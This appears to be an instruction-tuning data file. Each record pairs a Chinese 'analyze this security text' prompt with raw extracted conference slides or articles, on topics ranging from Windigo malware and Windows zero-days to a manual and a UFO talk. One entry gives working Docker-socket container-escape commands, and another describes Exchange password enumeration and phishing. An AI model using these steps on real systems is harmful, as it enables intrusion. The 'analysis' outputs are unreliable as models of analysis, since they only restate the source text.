{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Driverless Vehicles Zoz Intelligent Ground Vehicle Competition Student Unmanned Aerial Systems RoboBoat RoboSub International Aerial Robotics Competition  Advantages:  Energy efficiency  Time efficiency  New applications The Revolution Is Coming The Revolution Is Coming FUD Autonomous/Unmanned Systems Autonomous/Unmanned Systems Autonomous/Unmanned Systems  No human driver/pilot on-board  May have off-board controller/supervisor  May have on-board safety pilot/passengers  Military early adopters UAS Uptake Northrop Grumman Unmanned Advanced Capability Aircraft and Ground Combat Vehicles It shall be a goal of the Armed Forces to achieve the fielding of unmanned, remotely controlled technology such that by 2015, one-third of the operational ground combat vehicles of the Armed Forces are unmanned. National Defense Authorization Act for Fiscal Year 2001 (S. 2549, Sec. 217) Some UGVs are designed with threats in mind... Civil Applications Transportation Filmmaking Oceanography Mapping Logistics Powerline Inspection Civil Applications  Priorities:  Precision Agriculture  Self-Driving Cars  Roadblocks:  Shared Infrastructure (Airspace, Roads)  Acceptance (Safety, Robustness)  Lets Talk Failure! Classic Failures RQ-3 DarkStar $10m Unit Procurement Cost (Units 11-20, 1994 $) On its second flight, due to a software fault in the flight control system the aircraft's porpoising oscillations increased to a nose-high stall as it left the ground and the vehicle crashed. International Journal of Unmanned Systems Engineering, Vol. 1, No. S3, 15  Expectations of the designers are critical!  Exploitation happens at expectation boundary cracks Classic Failures Sandstorm DARPA Grand Challenge 2004  Deciding what the robot knows is a constant battle  Correct state estimation is key to decision making  Successful exploits will most likely subvert state estimation Autonomous Vehicle Logic Structures Activity Hierarchy Control Loops, Stability Maintenance Collision Avoidance Navigation", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUser Profile Based Anomaly Detection Fighting Malicious Insider Threat at Office365 Lei He Principal Engineering Manager, Microsoft Corporation 2019-05-30 The Context - Office365 Security Requirements *Customer lockbox onboarding is must only for enterprise service accessing customer data.  Cannot use Corp identity to depoly or access, 2FA must for access  OCEs need to meet clearance expecation  Isolation between capacity and control plane  Zero standing access and least privelege access  Customer lockbox & BYOK  ETW-based detailed raw telemetry, with ability to instrument new telemetry in < 1 day  Centralized processing raises alerts in < 15 minutes for security issues  At least 1 attack/day simulated against service to validate monitoring/response  Ability to trigger security response workflows in < 15 minutes, and instrument new workflow in < 1 day  All secrets must be stored in secure container  Secrets should never leave boundary  Secrets should be rolled immediately on exposure  Data Trustee should have full control of secrets in soverign environment  All prod end point scanned every day  All medium and higher rated vulnerabilitis should be patched or exempted  All web apps should be scanned once a month  Central reporting and tracking Access Control Security Monitoring Secrets Management Anti Virus Patching Overview Problem  Compromised/Disgruntled Malicious Insiders Remain a Top Threat  Supervised ML Detections Trained to Detect Known Patterns; Need Coverage for Unknown Patterns Solution  User Profile Based Detection to Flag Abnormal Activities  For O365 Data Center Security, User == DevOps  Can be Generalized to Other Entity Profiles O365 Data Center Monitoring Automated Near Real Time Multi Tier Detection and Response Vanquish Monitoring Pipeline O(100K) machines evaluated O(1k) users evaluated Near real time (NRT) multi tier processing on Spark: paging alerts in < 15 minutes (including ML-based alerts) Analyst Tools and Dashboards Interactively view resul", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOh Sieng Chye, Researcher ESET ASIA (Singapore) ESET Researchers Acknowledgement 2 Partners Acknowledgement 3 Introduction ESET research team published a paper titled \"Operation Windigo\", detailing how thousands of Linux and Unix servers were compromised, and used to steal SSH credentials, and redirect web visitors to malicious content and send spam. Provide an overview of this campaign, and the three main malicious components of this operation:  Linux/Ebury  an OpenSSH backdoor used to keep control of the servers and steal credentials  Linux/Cdorked  an HTTP backdoor used to redirect web traffic  Perl/Calfbot  a Perl script used to send spam 4 Introduction The objective of this campaign is to gain monetary rewards. It is done via the followings ways:  Spam  Users infection via drive-by downloads  Redirection of web traffic to advertisement networks 5 Timeline 6 Timeline 7  September 2013 : ESET captures network traffic from a server infected by Linux/Ebury running a reverse proxy service used as a target for Linux/Cdorked redirections, revealing over 1,000,000 web redirections in 48 hours.  October 2013: ESET captures 72 hours of network traffic revealing more than 12,000 servers infected with Linux/Ebury.  January 2014: ESET captures network traffic during three distinct 24-hour periods from a server running both a Linux/Ebury exfiltration service and a Perl/Calfbot command and control reverse proxy, revealing an average of 35 million spam messages sent daily. High Level Operation 8 High Level Operation Several piece of malware used in the campaign:  Linux/Ebury runs mostly on Linux servers. It provides a root backdoor shell and has the ability to steal SSH credentials.  Linux/Cdorked runs mostly on Linux web servers. It provides a backdoor shell and distributes Windows malware to end users via drive-by downloads.  Perl/Calfbot runs on most Perl supported platforms. It is a lightweight spam bot written in Perl.  Win32/Boaxxe.G, a click fraud malware, and Win32/Glu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Challenge #3 Solved together with YaakovCohen88 ## Description > Hello again, Agent. > > After you disabled the weapon system, we have successfully raided the terrorist compound and took all present into custody. > > The terrorists destroyed much of the data they kept, but we have managed to retrieve an encrypted file containing links to the other members of the network, as well as the program used to encrypt it. > > Sadly, the encryption computer was destroyed. Aside from unidentified manufacturer markings on the front (Or... Po... Ltd.) we don't know anything about it. > > Hopefully that won't stop you from decrypting this important intel. > > Good luck!, > M.| A binary file (`EncryptSoftware.exe`) and an encrypted file (`intel.txt.enc`) were attached. ## Solution Let's start by running the program: ```console E:\\CTFs\\mossad>EncryptSoftware.exe USAGE: Encrypt <input file name> <output file name> ``` It looks like the program expects two arguments: An input filename and an output file name. We'll use Ghidra to investigate the program. We'll show the decompilation output (after performing some renaming). The full decomplied output can be found in the `Challenge3_files` folder. We'll start with the main function: ```c undefined4 __cdecl main(int argc,char **argv) { char *output_buffer; HANDLE *ppvVar1; HANDLE pvVar2; DWORD bytes_written; int bytes_to_write; LPCWSTR lpOutputFileName; if (argc < 3) { print(\"USAGE: Encrypt <input file name> <output file name>\"); return 0xffffffff; } argc = 0; output_buffer = encrypt(argv[1],&argc); lpOutputFileName = (LPCWSTR)argv[2]; ppvVar1 = (HANDLE *)allocate(4); if (ppvVar1 != (HANDLE *)0x0) { pvVar2 = CreateFileW(lpOutputFileName,0x40000000,0,(LPSECURITY_ATTRIBUTES)0x0,2,0x80,(HANDLE)0x0 ); bytes_to_write = argc; *ppvVar1 = pvVar2; if (pvVar2 == (HANDLE)0xffffffff) { free(ppvVar1); return 0; } bytes_written = 0; WriteFile(*ppvVar1,output_buffer,argc,&bytes_written,(LPOVERLAPPED)0x0); if (bytes_written != bytes_to_write) { cleanu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nQuick Start For Cluster Node Servers Important hardware and safety information and guide to server documentation Xserve 3 1 Overview of Xserve Hardware, Setup, and Safety This booklet provides an illustrated reference for your Xserve hardware and an orientation to unpacking, setting up, and using your server. Use it as your road map to the procedures and documents necessary to: m Install the server hardware in a rack m Work with server components m Set up Mac OS X Server software m Monitor server operations and make adjustments as needed A list of documents that provide information and instructions for Xserve, with a description of each document, appears in Where to Find Instructions for Xserve Hardware and Software on page 13. This booklet also includes instructions for installing or restoring server software from a remote computer. 4 Removing the Server From Its Packaging To protect its precision components, the server is shipped in special packaging, with a temporary plastic faceplate covering its front panel. You need to remove this faceplate before opening the server or installing it in a rack. Xserve is specifically designed for rack mounting. It is not designed for use as a desktop computer. Note: If at all possible, work with another person when handling the server. Follow these steps to remove the server from its carton and remove the faceplate. 1 Open the carton, remove any foam or other packaging, and fold back the plastic covering the server. 2 With one person holding the server on each side, carefully lift the unit and place it on a table. Warning Do not place a monitor or any other equipment on top of the server. Any weight on the servers case could damage the components inside the unit. 5 3 Remove the protective faceplate from the servers front panel by unscrewing the thumbscrews at each side of the faceplate and lifting it off. Remove the additional shipping screws on either side of the server. (The shipping screws do not need to be reinstalled unless", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrojan-tolerant Hardware + Supply Chain Security in Practice Vasilios Mavroudis Doctoral Researcher, UCL Dan Cvrcek CEO, Enigma Bridge Who we are Vasilios Mavroudis Doctoral Researcher, UCL Dan Cvrcek CEO, Enigma Bridge George Danezis Professor, UCL Petr Svenda Assistant Professor, MUni CTO, Enigma Bridge Highlights  The private life of keys  Weak links of the supply chain  Lessons learned from airplanes  Demo of our crypto hardware  Protocols, Maths & Magic  Politics, Distrust & Hardware Security The Private Life of Keys 1. Someone designs an integrated circuit (IC) 2. IC is fabricated 3. IC is delivered to hardware vendor 4. Vendor loads firmware & assembles device 5. Device is sent to customer 6. Customer generates and stores key on the device The Private Life of Keys 1. Someone designs an integrated circuit (IC) 2. IC is fabricated 3. IC is delivered to hardware vendor 4. Vendor loads firmware & assembles device 5. Device is sent to customer 6. Customer generates and stores key on the device Any attack in these steps can compromise the key! Hardware Security Modules Physical computing device that safeguards and manages digital keys for strong authentication and provides cryptoprocessing. Features:  Cryptographic key generation, storage, management  Tamper-evidence, Tamper-resistance, Tamper-response  Security Validation & Certification Crypto Operations are carried out in the device No need to output the private keys! Hardware Security Modules Common Applications - Public Key Infrastructures - Payment Processing Systems - SSL Connections - DNSSEC - Transparent Data Encryption Cost - Hardware (>$10k) - Integration Cost - Operational/Support HSM Guarantees 1. Someone designs an integrated circuit (IC) 2. IC is fabricated 3. IC is delivered to hardware vendor 4. Vendor loads firmware & assembles device 5. Device is sent to customer 6. Customer generates and stores key on the device What could go wrong?  Bugs  Backdoors/HT? CVE-2015-5464 The HSM allows remote authen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMomigari 最新的Windows操作系统内核在野漏洞概述 Boris Larin @oct0xor 30-May-19 Anton Ivanov @antonivanovm 讲师介绍 高级恶意软件分析师启发式检测和漏洞研究团队 Boris Larin 高级威胁研究和检测团队负责人 Anton Ivanov Twitter: @oct0xor Twitter: @antonivanovm 3 内容梗概 Momigari: 日本人在秋天寻找最美 丽的树叶的传统 中国东北 吉林省 蛟河市. [新华社图片] http://en.safea.gov.cn/2017-10/26/content_33734832_2.htm 4 内容梗概 5 内容梗概 1我们将简要介绍我们找到零日漏洞的方法以及所面临的挑战 2我们将介绍我们发现的三个在野特权提升EOP零日攻击  Windows系统内核漏洞利用变得更加困难  ITW样本分析帮助我们获得事情的现状和新技术的见解  我们将详细介绍Windows 10 RS4的两个漏洞利用 3我们将揭示这些漏洞采用的开发框架 卡巴斯基实验室检测技术 6 我们通常会在报告中添加此详细信息 这是我们去年发现的所有漏洞背后的两项技术 技术1 - 漏洞利用预防 7 交付 内存 操纵 运行 Shellcode 执行 预防漏洞利用 检测和阻止 Payload执行 开始 技术2 - 沙箱 用于分析的装配工 件 用于测试的 文件/ URL - 执行日志 - 内存转储 - 系统/注册表更改 - 网络连接 - 截图 - 利用工件 关于判定活动性质的详细数据 测试虚拟机 文件/ URL将被发送到多个测试虚拟机 工件记录 检测漏洞 发现 开发 研究 如何: 卡巴斯基实验室捕获的在野漏洞利用  2018年5月 - CVE-2018-8174Windows VBScript引擎远程执行代码漏洞  2018年10月 - CVE-2018-8453Win32k特权提升漏洞  2018年11月 - CVE-2018-8589Win32k特权提升漏洞  2018年12月 - CVE-2018-8611Windows内核特权提升漏洞  2019年3月 - CVE-2019-0797Win32k特权提升漏洞  2019年4月 - CVE-2019-0859Win32k特权提升漏洞 近一年来: 是什么让我们夜不能寐 一家公司在一年内发现了六个漏洞 其中一个漏洞是通过Microsoft Office中的远程代码执行 还有五个漏洞涉及到特权提升 虽然这个数字很大但它只是冰山一角 单个漏洞获取计划的奖金示例 https://zerodium.com/program.html: 为什么我们没有看到很多针对浏览器的漏洞其他软件的漏洞 以及网络零点击远程代码执行的漏洞被捕获 即使漏洞攻击已经被检测到了大部分的案例分析所需要的数据远比实际检测中所能收集到的数据要多 零日发现的复杂度 我们的技术旨在漏洞的检测和预防开发 但要确定检测到的漏洞是否为零日漏洞则需要进行额外的分析 一些漏洞很容易被发现 沙箱进程开始有异常的行为 一些漏洞很难被发现 由其他软件引起的虚假警报 示例安装在同一台计算机上的两个或多个安全软件 需要改进的领域浏览器 需要进一步的分析漏洞利用脚本 扫描整个内存以查找所有脚本同样是不切实际的 可能的解决方法 浏览器为安全应用程序提供接口以请求加载的脚本类似于反恶意软件扫描接口AMSI 问题 如果在同一进程中实现漏洞利用程序可以对此进行修复 检测特权提升漏洞 特权提升漏洞通常用于攻击的后期阶段 当前操作系统提供的事件记录足以用于构建检测 由于它们通常以本机代码实现 - 因此可以轻松分析它们 特权提升漏洞可能是最适合用于分析的 15 案例 1 CVE-2018-8453 攻击模块以加密的形式分发 我们发现的样本仅针对x64平台  但分析表明对x86的攻击也是可以是实现的 编写的代码是为了支持下一个OS版本 :  Windows 10 build 17134  Windows 10 build 16299  Windows 10 build 15063  Windows 10 build 14393  Windows 10 build 10586  Windows 10 build 10240  Windows 8.1  Windows 8  Windows 7 16 Win32k 我们今天要讨论的四个漏洞中有三个存在于Win32k中 Win32k是一个处理图形用户输入UI元素的内核模式驱动程序 它自Windows诞生之时就存在了 起初它是在用户模式上实现的但后来它的主要部分被转移到了内核  为了提升性能 这是一个非常大的攻击面  超过1000个系统调用 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n技术分享Exchange渗透测试总结 本期安仔课堂ISEC实验室的唐老师将为大家介绍Exchange相关知识点欢迎感兴趣的 朋友一起交流学习 一 Exchange概述 Exchange是微软出品的邮件服务器系统凭借其强大的功能优势被应用到很多企业学校的 邮件系统搭建中 截至目前Exchange已有多个成熟版本例如Exchange Server 201020132016及最 新版本2019此外Exchange又可分为Exchange Server和Exchange Online ,为了方便 本文将主要以本地Exchange Server 2010为例进行演示 二组成 首先让我们一起了解下Exchange的结构组成目前最新版本Exchange主要包含两个角色 分别是邮箱服务器角色和边缘传输服务器角色 2.1 邮箱服务器角色 ISEC安全e站 技术分享Exchange渗透测试总结 https://mp.weixin.qq.com/s/xTgIBnd1pbrZZltqglhoCQ 第1页 共19页 2020/7/7 12:29 1.包含用于路由邮件的传输服务 2.包含处理呈现和存储数据的邮箱数据库 3.包含接受所有协议客户端连接的客户端访问服务 http RPC over HTTP MAPI over HTTP pop3 imap4 um呼叫 4.包含向邮箱提供语音邮件和其他电话服务功能的统一消息(UM)服务 2.2 边缘传输服务器角色 1.处理Exchange组织的所有外部邮件流 2.通常安装在外围网络中可订阅内部Exchange组织当Exchange组织接收和发送邮件时 EdgeSync同步进程会向边缘传输服务器提供收件人信息和其他配置信息 技术分享Exchange渗透测试总结 https://mp.weixin.qq.com/s/xTgIBnd1pbrZZltqglhoCQ 第2页 共19页 2020/7/7 12:29 图1 其中渗透测试人员最为关心Exchange对外提供的访问接口以及使用的加密验证类型 三邮件访问形式 通过上面的介绍我们可以了解Exchange Server支持的协议接下来我们学习如何通过对应客 户端访问这些协议 3.1 相关接口 1.outlook客户端(MAPI协议) 2.outlook web app(以web形式访问 https://域名或ip/owa) 3.POP3和IMAP4(可以通过POP3协议利用其他客户端) 以下为目前默认的部分前端虚拟目录可用于识别Exchange服务密码枚举或权限维持 1.API(2016以后版本有效) 2.ecp Exchange(管理中心web形式访问https://域名或ip/ecp) 3.EWS(Exchange Web Services) 4.Autodiscover 5.MAPI 6.Microsoft-Server-ActiveSync 7.OAB(web形式访问https://域名或ip/oab) 8.owa 9.PowerShell 10.Rpc 技术分享Exchange渗透测试总结 https://mp.weixin.qq.com/s/xTgIBnd1pbrZZltqglhoCQ 第3页 共19页 2020/7/7 12:29 图2 四密码枚举 在无任意内网权限用户账号权限时可尝试对已知账号进行密码枚举 密码枚举可以利用的接口 1.Autodiscover(401认证NTLM Authenticate) 2.OWA(post表单) 3.EWS(401认证NTLM Authenticate) 4.Microsoft-Server-ActiveSync(401认证+base64) 结合部分社工手段可获取已知账号如搜索intext:*@xxxx.com 其中比较好用的一款Exchange密码枚举工具 图3 安装 图4 以ruler密码枚举模块为例进行演示ruler是针对Exchange的半自动利用工具其Brute功能 使用率较高主要通过Autodiscover接口进行密码枚举 准备用户名密码字典user.txtpass.txt 技术分享Exchange渗透测试总结 https://mp.weixin.qq.com/s/xTgIBnd1pbrZZltqglhoCQ 第4页 共19页 2020/7/7 12:29 图5 以上为理想状态的测试情况实际情况下需要足够多的账户密码避免因过多尝试而冻结还 可通过控制-delay参数或burp进行密码枚举 五邮箱社工测试 5.1 通过钓鱼获取账户密码 为了提升员工安全意识在渗透测试时往往还会被要求做邮件钓鱼测试钓鱼邮件内容不限可 以自由发挥如复制owa界面制作钓鱼页面等 尝试伪造发件人发送钓鱼邮件 图6 在被测试的用户点", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNext Generation Process Emulation with Binee Kyle Gwinnup @switchp0rt John Holowczak @skipwich Carbon Black TAU The Problem: getting information from binaries Each sample contains some total set of information. Our goal is to extract as much of it as possible Time/Cost to analyze Sample coverage Static Dynamic High coverage Immediate discovery Few features Low coverage Long discovery Many features Core Problems 1. Obfuscation hides much of the info 2. Anti-analysis is difficult to keep up with 3. Not all Malware is equal opportunity Our Goal: Reduce cost of information extraction 1. Reduce the cost of features extracted via dynamic analysis 2. Increase total number of features extracted via static analysis 3. Ideally, do both of these at scale Time/Cost to analyze Sample Coverage Dynamic Static + Emulation High coverage Immediate discovery Many features Low coverage Long discovery Many features The How: Emulation Extend current emulators by mocking functions, system calls and OS subsystems Existing PE Emulators  PyAna https://github.com/PyAna/PyAna  Dutas https://github.com/dungtv543/Dutas  Unicorn_pe https://github.com/hzqst/unicorn_pe  Long list of other types of emulators https://www.unicorn-engine.org/showcase/ Requirements: What are we adding/extending from current work? 1. Mechanism for loading up a PE file with its dependencies 2. Framework for defining function and API hooks 3. Mock OS subsystems such as a. Memory management b. Registry c. File system d. Userland process structures 4. Mock OS environment configuration file a. Config file specifies language, keyboard, registry keys, etc b. Rapid transition from one Mock OS configuration to another Binee Where to start? Parse the PE and DLLs, then map them into emulation memory... Build hook table by linking DLLs outside emulator Target PE DLL1 DLL2 DLL3 Emulated Process Memory Binee Address to Hook table 1. Open PE and all dependencies 2. Update DLL base addresses 3. Update relocations 4. Build Binee exports lookup tab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid Proguard 混淆对抗之我见 关于何为 Proguard,可以参考 GuardSquare 官网其优化业务及 Wikipedia 相关条目. Proguard:https://www.guardsquare.com/proguard Wikipedia:https://en.wikipedia.org /wiki/ProGuard 局部敏感哈希与 Proguard 混淆对抗 2017 年 6 月,Richard Baumann 发表了标题为\"Anti-ProGuard: Towards Automated Deobfuscation of Android Apps\"(DOI:10.1145/3099012.3099020)的论文,其旨在利用 SimHash 算法 实现对 Apk 的自动化反混淆.关于何为 SimHash,简要来讲可以理解为可用之计算两个文本片段相似度的 算法,此处不再进行具体阐述,可以参考 Google 在 2007 年发表的论文\"Detecting Near-Duplicates for Web Crawling\" (DOI:10.1145/1242572.1242592). 论文第二部分中,其强调 Proguard 对 Apk 进行 Obfuscating 的过程是多个 Transformation 的集 合,论文设欲混淆工程为 P,而 P 可看作同时包含多个对象的对象集合,对象集合中包含的对象与未混淆之 工程中的类,方法,成员一 一存在映射关系,作者统一称这些对象为 S.即 P={S1,S2,S3...}, 经过 Proguard 混淆后的工程设之为 P',而 Proguard 的混淆过程可看作一个能够传入任意量的 Transformation 函数 T(x),即 P'= {T(S1),T(S2),T(S3)...}.可见论文强调整个混淆过程为对整个未混淆工 程中各个元素进行转换的总和(事实上也确实如此),而该思想在接下来的分析中也会多次得到体现. 而论文中的第三部分正式进入到自动化反混淆的实现部分,但由于论文中阐述的实现思路略去了很 多细节,故下文不以论文进行分析,而 Richard Baumann 已经将自动化方案落地,在其 Github 账户 ohaz 下即可找到对应的 POC 项目(论文中并未给出其实现的项目地址,而该项目的首次 commit 时间最早为 2016 年, 即早于论文发布时间).接下来以该项目具体分析自动化反混淆的实现思路. https://github.com /ohaz/antiproguard 作者在其项目 README 文件上简述了工具的基本使用,需要引起注意的是其工具的 --sb -t 参数与 -d 参数,其前者用于指定一个未被混淆的 Apk,并将未混淆 Apk 之包,类,方法名及其对应的方法实体逐一 抽离提取,存入数据库,后者为反混淆的进行指定一个欲反混淆的 Apk. 由于篇幅限制,下文仅对项目最核心的算法部分进行分析,并在分析前假设一个前提:数据库中已经填 充了足够多的未混淆 Apk. 项目中 antiproguard.py 申明了一个关键方法 compare ,该方法用于将传入的欲分析方法实体(被混 淆)与数据库中储存的各个方法实体(未混淆)分别进行相似度对比,并依据相似度对比结果判断是否生成 一个 hint ,该生成的 hint 将作为辅助分析其他被混淆方法实体的依据. 可见在 compare 方法内,程序分别对被混淆方法实体分别生成了三个不同的 SimHash 值,而经过后续验证,这三个 SimHash 的产生均与方法实体所对应的操作码串有高度关联, 则此三个 SimHash 值的关系可以下图进行表达. 由上图不难得知这三个 SimHash 值与被混淆方法实体的关联强度有关,并按照关联强度以由大到小 的顺序排列. 接着该三值分别与数据库中的未混淆方法实体对应产生的此三个 SimHash 值以论文中提到 的如下方式分别进行一次计算: SimHash 结合汉明距离,该计算方式得出的结果可抽象理解为两个方法实体的相似程度,接着程序判 断计算出的相似程度是否大于 90%,若超过该值,则判断该被混淆方法实体与正在与之进行对比的未混淆 方法实体高度相似,此时即可为下一次 compare 的调用产生一个 hint ,根据该 hint 以加快识别其他方法 实体相似程度的速度,此处不再对 hint 更进一步分析. 而最终程序将对所有经过 compare 方法确定的与数据库中未混淆的方法实体产生对应关系的被混淆 的方法实体进行批量重命名,将其方法名'还原'为数据库中对应的未混淆方法实体的对应方法名,简而言 之, compare 方法负责确定被混淆方法与数据库中的那", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRichard Thieme - DefCon 29 - August 6, 2021 UFOs Misinformation, Disinformation, and the Basic Truth Date: September 25, 1947 From: Lt. General Nathan Twining To: Commanding General of the Army Air Forces; Brig. General George Schulgen Subject: Air Materiel Command Opinion Concerning \"Flying Discs\" ... It is the opinion that: a. The phenomenon reported is something real and not visionary or fictitious. b. There are objects probably approximating the shape of a disc. Of such appreciable size as to appear to be as large as man-made aircraft. c. The reported operating characteristics such as extreme rates of climb, maneuverability, and action which must be considered evasive when sighted by friendly aircraft and radar ...\" https://science.howstuffworks.com/space/aliens-ufos/rb-47-ufo.htm An Introduction to the RB47 Incident www.minotb52ufo.com  A NARRATIVE OF UFO EVENTS AT MINOT AIR FORCE BASE CASES CASES CASES READ THEM READ THEM READ THEM THE WAY FORWARD https://thiemeworks.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPresents My Favorite Fails, 2013 Rich Mogull @rmogull Thursday, September 26, 13 5 Thursday, September 26, 13 Beijing, China 2011 Thursday, September 26, 13 Thursday, September 26, 13  25 student  50 instances  50 SSH connections Thursday, September 26, 13 1 IP Address Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 4 Thursday, September 26, 13 Thursday, September 26, 13 3 Thursday, September 26, 13 Have you ever heard of Heap Spray? Thursday, September 26, 13 We were the guys that heap sprayed the college from Amazon Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 2 Thursday, September 26, 13 Thursday, September 26, 13 I am contacting you on behalf of ISACA, formerly the Information Systems Audit and Control Association Trade Association, who would like to speak with you about how IT can transform cybersecurity using COBIT 5  a framework to integrate cybersecurity with an overall approach to security governance, risk management and compliance. This is critical for IT teams in the wake of escalating Advanced Persistent Threats (APTs). More than 80 percent of 1500 security professionals surveyed by ISACA admit they are not prepared for APTs. The challenge of APTs is particularly daunting in the face of always-on connectivity, an increasing IT-centric society and a new class system that separates people by technology skills. Thursday, September 26, 13 Thursday, September 26, 13 1 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13 Thursday, September 26, 13", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 18 Electronic Weapons Presented by: mage2 Warning Mucking about with the things I am about to talk to you about can and will kill you and all puppies, kittens and laptops around you. So be forewarned. Also transmitting on frequencies you are not licensed for can really piss off the FCC and DHS, depending on what trouble you cause. Warning Part 2 This is a warning to all of those in the room right now. I am a horrid public speaker, I tend to talk fast and can easily get off topic. Now you are thinking why is he up there talking... Well I wanted to bring something to DEFCON, this is my 10th year attending. Things like this is something I am interested in and I want to bring my interests to others. I want to make you ask questions. If you have a question I hope to have a good amount of time after the slides for Q/A, I will also be around after the talk. What we will cover EMP EFI/RFI Lasers Others, etc Electronic Basic Concepts * All conductive material can act as an antenna. * Most electronics are sensitive to voltage spikes. * Most communication based electronics run on relatively low power signals. < 1W * Atomic and Nuclear weapons are not the only sources of EMP. * Voltage is based on the potential difference between the source and the ground. * Ohms law , learn it love it. V over IR squared. * We all know computers and all digital electronics run on binary signals. * This is represented as a square wave between 0v/GND and either 3.3v or 5v * There is a threshold of what the hardware expects to see as a high or a low. * When using transformers , you will trade current for voltage. * RF power diminishes over distance, closer = better. What are we working with RFI/EMI Using RFI/EMI as an attack is usually a DOS type of an attack. You will be creating a signal that is stronger than your target's signal. Your signal can be anything or just noise. These can be one of the easiest tools to aquire/build. RFI/EMI cont. Here are a few of the devices that can be used f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFingerBank - open DHCP fingerprints database no it's not about a bank of fingers... Presentation Plan Device fingerprinting, passive fingerprinting, DHCP fingerprinting Defensive use cases Offensive use cases FingerBank announcement FingerBank's future Who I am Olivier Bilodeau System architect working at Inverse inc PacketFence lead developer since 2009 Teaching InfoSec to undergraduate in Montreal ... new father, Open Source nuts, enjoying CTFs a lot, android developer, brewing beer Social stuff twitter: @packetfence / identi.ca: @plaxx delicious: plaxxx / linkedin: olivier.bilodeau Device fingerprinting reminder Identifies software or hardware components Various types Operating Systems Devices Browsers Web Server Web Applications Two approaches of gathering fingerprints Active Pros: On demand Cons: Detectable, sometimes intrusive Passive Pros: Stealth Cons: not on demand Passive fingerprinting reminder Networks are really noisy Some protocols use broadcast Just wait for the goods to come to you LAN fingerprinting mDNS, TCP, ARP, DHCP, ... WAN fingerprinting honeypots DHCP Fingerprinting reminder The pervasiveness and broadcast nature of DHCP makes it compelling IP Helpers (UDP Helper Address) makes it very easy to collect centrally Rarely spoofed DHCP Fingerprinting reminder (contd.) DHCP Elements to fingerprint DHCP retransmission timing (actual vs in packet) IP TTL on DHCP packets DHCP Options (55: requested parameters, 60: vendor id, ...) Number and order of option 55 is particularly precise and interesting Defensive Use Cases Easy Operating System Inventory Even more powerful if IP-Helpers use DHCP Option 82 NAC integration to blacklist end-of-life OS ex: Win 2000 and earlier NAC integration to automatically allow dumb devices (shh!) Offensive Use Cases Stealth LAN Recon! ... Any other ideas? Why FingerBank? There are User-Agent databases out there There are snort signature databases out there What about DHCP Fingerprints? Consolidate information hidden in si", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 挂载 Docker Socket 逃逸 --- <center><h1>挂载 Docker Socket 逃逸</h1></center> --- Docker Socket 用来与守护进程通信即查询信息或者下发命令 ## 搭建 创建一个容器并挂载 /var/run/docker/sock 文件 ```plain docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu ``` 在容器内安装 Docker 命令行客户端 ```plain docker exec -it with_docker_sock /bin/bash apt-get update apt-get install curl curl -fsSL https://get.docker.com/ | sh ``` ## 检测 ```plain ls -lah /var/run/docker.sock ``` 如果存在这个文件说明漏洞可能存在 ## 复现 在容器内部创建一个新的容器并将宿主机目录挂载到新的容器内部 ```plain docker run -it -v /:/host ubuntu /bin/bash ``` <img width=\"1200\" src=\"/img/1650014060.png\"> 在新的容器内执行 chroot将根目录切换到挂载到宿主机的根目录其实不挂载也行 ```plain chroot /host ``` <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年4月15日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n营销活动和反作弊 01 业务概述  业务形式 裂变/签到/抽奖/走路等  风险类型 黑产/自然人/众包等 三方博弈 业务概述 反作弊和业务  营销反作弊是信任品  业务需求第一事前明确边界  我的地盘我做主重视规则设计  知己知彼不过度承诺 业务概述  黑产很精明 收益率高钞票多多  黑产很聪明 对抗是什么本质是反馈系统 如何干扰攻击者的反馈系统 查杀分离 延迟/混淆处置 攻击者如何干扰我们的反馈系统 模拟行为以假乱真 降低攻击量浑水摸鱼积小成多 反馈系统 黑产分工 反作弊和黑产 业务概述 营销反作弊框架 裂变反作弊实战 02 裂变反作弊 作弊模式演变(黄色为spammer) 风险评估与方案设计 快手极速版裂变拉新 裂变反作弊 木桶原理 常用方法 如何感知 裂变反作弊 行为模型 优化 独立异常检测 如何感知 裂变反作弊 威胁情报 效果反馈 如何验证 大型活动实战经验 03 大型活动 对接流程 质效建设举 例 经验总结 提问环节 提问环节", "category": "text_analysis", "source": "security_papers"}
